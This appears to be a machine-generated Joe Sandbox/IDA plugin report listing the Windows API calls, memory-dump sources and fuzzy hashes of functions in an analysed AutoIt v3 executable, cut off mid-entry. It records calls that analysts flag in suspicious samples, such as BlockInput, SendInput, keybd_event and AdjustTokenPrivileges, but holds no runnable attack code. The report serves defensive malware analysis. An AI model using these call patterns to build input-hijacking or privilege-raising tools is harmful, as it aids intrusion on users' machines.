                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: NameUser
                                                                                                                                                                        • String ID: X64
                                                                                                                                                                        • API String ID: 2645101109-893830106
                                                                                                                                                                        • Opcode ID: 00240cbe4466cfeb8a480c6f6ad57cdb927158f1bb74db4cc7ddd76502092590
                                                                                                                                                                        • Instruction ID: ec148ace329ba77218d91c279be3340c9566176f43fcc60c4b01bb577ba3ac91
                                                                                                                                                                        • Opcode Fuzzy Hash: 00240cbe4466cfeb8a480c6f6ad57cdb927158f1bb74db4cc7ddd76502092590
                                                                                                                                                                        • Instruction Fuzzy Hash: DED0C9B482111DEACF80CB50EC88DDD737CBB04344F1146A6F106A2000DB70A5488F20
                                                                                                                                                                        Function 002D41FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,002E52EE,?,?,00000035,?), ref: 002D4229
                                                                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,002E52EE,?,?,00000035,?), ref: 002D4239
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3479602957-0
                                                                                                                                                                        • Opcode ID: c7af082bae1de0bc4ae124e6f557f9d44f13761b2072eda89c02aa012645df1f
                                                                                                                                                                        • Instruction ID: 4d87cd8e010bc7deb859be04bdf000c1a658346cd787fdd06f76e9e7f0ed4b91
                                                                                                                                                                        • Opcode Fuzzy Hash: c7af082bae1de0bc4ae124e6f557f9d44f13761b2072eda89c02aa012645df1f
                                                                                                                                                                        • Instruction Fuzzy Hash: 4DF0A0306102256BE7202A65AC4DFEB366EEFC5761F00017AF905D2281D9709E40CAB0
                                                                                                                                                                        Function 002CBBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 002CBC24
                                                                                                                                                                        • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 002CBC37
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3536248340-0
                                                                                                                                                                        • Opcode ID: 0bccb2a4aafec50a0fdf5e636745d3bc402dc73c5356e5ed9a9a57e15d92965f
                                                                                                                                                                        • Instruction ID: add8caddb1f807246edb812cde32dce8bc99833e632371bba580ceac0ce06e48
                                                                                                                                                                        • Opcode Fuzzy Hash: 0bccb2a4aafec50a0fdf5e636745d3bc402dc73c5356e5ed9a9a57e15d92965f
                                                                                                                                                                        • Instruction Fuzzy Hash: 9EF0677081024EAFDB019FA0D80ABFEBBB0FF08319F00801AF955AA192C3798211DF94
                                                                                                                                                                        Function 002C1A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002C1B48), ref: 002C1A20
                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,002C1B48), ref: 002C1A35
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                                                        • Opcode ID: 992a7459ece37d60b32fc1e4744ec9b27f5f76f12d4dc1aca27f21b8394e3038
                                                                                                                                                                        • Instruction ID: cb39dd0c00c1256507d160515a0237d2e9f170057dfa7f52d2147e9626e7213b
                                                                                                                                                                        • Opcode Fuzzy Hash: 992a7459ece37d60b32fc1e4744ec9b27f5f76f12d4dc1aca27f21b8394e3038
                                                                                                                                                                        • Instruction Fuzzy Hash: 3CE04F76015610AFE7252B10FC4AF7277A9EB04360F14892DF599804B0DB62ACA0EF14
                                                                                                                                                                        Function 002DF4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • BlockInput.USER32(00000001), ref: 002DF51A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: BlockInput
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3456056419-0
                                                                                                                                                                        • Opcode ID: 7a90e47fa9c2bcecf971e00070abc6e718156c2b2b7e5843bf9c80117363ae0a
                                                                                                                                                                        • Instruction ID: 4e54fcbc0b3bf8a3fe8064a2c0ff91ea8fe2e4fb09f93b8f6f1f9877d0908d86
                                                                                                                                                                        • Opcode Fuzzy Hash: 7a90e47fa9c2bcecf971e00070abc6e718156c2b2b7e5843bf9c80117363ae0a
                                                                                                                                                                        • Instruction Fuzzy Hash: FBE048352202055FC750AF69E404956F7DCAFA4761F008426F84AC7351D670FD90CB94
                                                                                                                                                                        Function 002CEC6C Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002CEC95
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: mouse_event
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2434400541-0
                                                                                                                                                                        • Opcode ID: e9fb93e8c818906164e4e3ffcc75196ad0bae632f828f86756e64bccfd9ca6ce
                                                                                                                                                                        • Instruction ID: ed215445a9a1d497900bb38e28d34a1585ab2e8961fc7cbe354b49d8c1ce7c18
                                                                                                                                                                        • Opcode Fuzzy Hash: e9fb93e8c818906164e4e3ffcc75196ad0bae632f828f86756e64bccfd9ca6ce
                                                                                                                                                                        • Instruction Fuzzy Hash: 89D017B61B020269EC280E3C9B2FF36090AAB02781F82434EB122D5595E4C19A24A121
                                                                                                                                                                        Function 00280D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0028075E), ref: 00280D4A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                        • Opcode ID: db6a9697dbb7ddcd788ad6178d2048c54af2a0a937091c29cc94abc421dbe010
                                                                                                                                                                        • Instruction ID: fa3770447d3e5dd4a1611d6f656fc876a97232049a5bd85b644c830280c4f38a
                                                                                                                                                                        • Opcode Fuzzy Hash: db6a9697dbb7ddcd788ad6178d2048c54af2a0a937091c29cc94abc421dbe010
                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                        Function 002E353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 002E358D
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 002E35A0
                                                                                                                                                                        • DestroyWindow.USER32 ref: 002E35AF
                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 002E35CA
                                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 002E35D1
                                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 002E3700
                                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 002E370E
                                                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E3755
                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 002E3761
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 002E379D
                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E37BF
                                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E37D2
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E37DD
                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 002E37E6
                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E37F5
                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 002E37FE
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E3805
                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 002E3810
                                                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E3822
                                                                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00300C04,00000000), ref: 002E3838
                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 002E3848
                                                                                                                                                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 002E386E
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 002E388D
                                                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E38AF
                                                                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 002E3A9C
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                                                                        • Opcode ID: 75a95cf4738d5732680e774fcc84faaf979c92c097a6e1244c32b114d45eb3be
                                                                                                                                                                        • Instruction ID: 66c7198a77adad1947d5d6f22f8d528dab2db3d09954f8f5501fee9b98448b17
                                                                                                                                                                        • Opcode Fuzzy Hash: 75a95cf4738d5732680e774fcc84faaf979c92c097a6e1244c32b114d45eb3be
                                                                                                                                                                        • Instruction Fuzzy Hash: 4702AB71910205AFDB14DF65DD8DEAE7BBAFB48321F108528F915AB2A0CB70AD51CF60
                                                                                                                                                                        Function 00261625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DestroyWindow.USER32(?,?), ref: 002616B4
                                                                                                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 002A2B07
                                                                                                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 002A2B40
                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 002A2F85
                                                                                                                                                                          • Part of subcall function 00261802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00261488,?,00000000,?,?,?,?,0026145A,00000000,?), ref: 00261865
                                                                                                                                                                        • SendMessageW.USER32(?,00001053), ref: 002A2FC1
                                                                                                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 002A2FD8
                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 002A2FEE
                                                                                                                                                                        • ImageList_Destroy.COMCTL32(00000000,?), ref: 002A2FF9
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                        • String ID: 0$(3$(3$(3
                                                                                                                                                                        • API String ID: 2760611726-703799961
                                                                                                                                                                        • Opcode ID: 1e3786715b9b905c70844094fdaf7307a125fd168f3c5c67ec2d282920462748
                                                                                                                                                                        • Instruction ID: 23c18375c248c2b3abfe9288b22ebafa98b61c65540f10aba1aa1c0fdc21bf99
                                                                                                                                                                        • Opcode Fuzzy Hash: 1e3786715b9b905c70844094fdaf7307a125fd168f3c5c67ec2d282920462748
                                                                                                                                                                        • Instruction Fuzzy Hash: 8612A034224202DFC725DF28D884B6AB7EAFB46310F184569F4559B661CB31F8BACF91
                                                                                                                                                                        Function 002F7B0D Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 002F7B67
                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 002F7B98
                                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 002F7BA4
                                                                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 002F7BBE
                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 002F7BCD
                                                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 002F7BF8
                                                                                                                                                                        • GetSysColor.USER32(00000010), ref: 002F7C00
                                                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 002F7C07
                                                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 002F7C16
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 002F7C1D
                                                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 002F7C68
                                                                                                                                                                        • FillRect.USER32(?,?,?), ref: 002F7C9A
                                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 002F7CBC
                                                                                                                                                                          • Part of subcall function 002F7E22: GetSysColor.USER32(00000012), ref: 002F7E5B
                                                                                                                                                                          • Part of subcall function 002F7E22: SetTextColor.GDI32(?,002F7B2D), ref: 002F7E5F
                                                                                                                                                                          • Part of subcall function 002F7E22: GetSysColorBrush.USER32(0000000F), ref: 002F7E75
                                                                                                                                                                          • Part of subcall function 002F7E22: GetSysColor.USER32(0000000F), ref: 002F7E80
                                                                                                                                                                          • Part of subcall function 002F7E22: GetSysColor.USER32(00000011), ref: 002F7E9D
                                                                                                                                                                          • Part of subcall function 002F7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002F7EAB
                                                                                                                                                                          • Part of subcall function 002F7E22: SelectObject.GDI32(?,00000000), ref: 002F7EBC
                                                                                                                                                                          • Part of subcall function 002F7E22: SetBkColor.GDI32(?,?), ref: 002F7EC5
                                                                                                                                                                          • Part of subcall function 002F7E22: SelectObject.GDI32(?,?), ref: 002F7ED2
                                                                                                                                                                          • Part of subcall function 002F7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 002F7EF1
                                                                                                                                                                          • Part of subcall function 002F7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002F7F08
                                                                                                                                                                          • Part of subcall function 002F7E22: GetWindowLongW.USER32(?,000000F0), ref: 002F7F15
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4124339563-0
                                                                                                                                                                        • Opcode ID: 022a4ff3cf345bbdc3d2621c05aa4a57cb556b36d976ee3c34e2bdbe54c1050e
                                                                                                                                                                        • Instruction ID: 0d0275818a6f5fa4af6d9e67e00d5c773c88a0cf981422711abc01124f4370cd
                                                                                                                                                                        • Opcode Fuzzy Hash: 022a4ff3cf345bbdc3d2621c05aa4a57cb556b36d976ee3c34e2bdbe54c1050e
                                                                                                                                                                        • Instruction Fuzzy Hash: 3CA1AC72018305AFD7009F64EC4CE7BBBAAFB483B5F500A29FA62961E0D771D854CB51
                                                                                                                                                                        Function 002E316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DestroyWindow.USER32(00000000), ref: 002E319B
                                                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002E32C7
                                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 002E3306
                                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002E3316
                                                                                                                                                                        • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 002E335D
                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 002E3369
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 002E33B2
                                                                                                                                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002E33C1
                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 002E33D1
                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 002E33D5
                                                                                                                                                                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 002E33E5
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002E33EE
                                                                                                                                                                        • DeleteDC.GDI32(00000000), ref: 002E33F7
                                                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002E3423
                                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 002E343A
                                                                                                                                                                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 002E347A
                                                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 002E348E
                                                                                                                                                                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 002E349F
                                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 002E34D4
                                                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 002E34DF
                                                                                                                                                                        • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002E34EA
                                                                                                                                                                        • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 002E34F4
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                        • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                        • API String ID: 2910397461-517079104
                                                                                                                                                                        • Opcode ID: ad22b182de248c62d0bf54336ddf66fdde1dc80ea623bc18ed62c6e86ebc134c
                                                                                                                                                                        • Instruction ID: 5ce107b8795b9d4c14315258d13cc2889a6790277db7a1fb0232b3acad32e708
                                                                                                                                                                        • Opcode Fuzzy Hash: ad22b182de248c62d0bf54336ddf66fdde1dc80ea623bc18ed62c6e86ebc134c
                                                                                                                                                                        • Instruction Fuzzy Hash: 2DB16E71A50205AFDB14DFA9DC89FAFBBA9EB08711F004115FA15E7290C774AD50CFA0
                                                                                                                                                                        Function 002D5524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 002D5532
                                                                                                                                                                        • GetDriveTypeW.KERNEL32(?,002FDC30,?,\\.\,002FDCD0), ref: 002D560F
                                                                                                                                                                        • SetErrorMode.KERNEL32(00000000,002FDC30,?,\\.\,002FDCD0), ref: 002D577B
                                                                                                                                                                        Strings
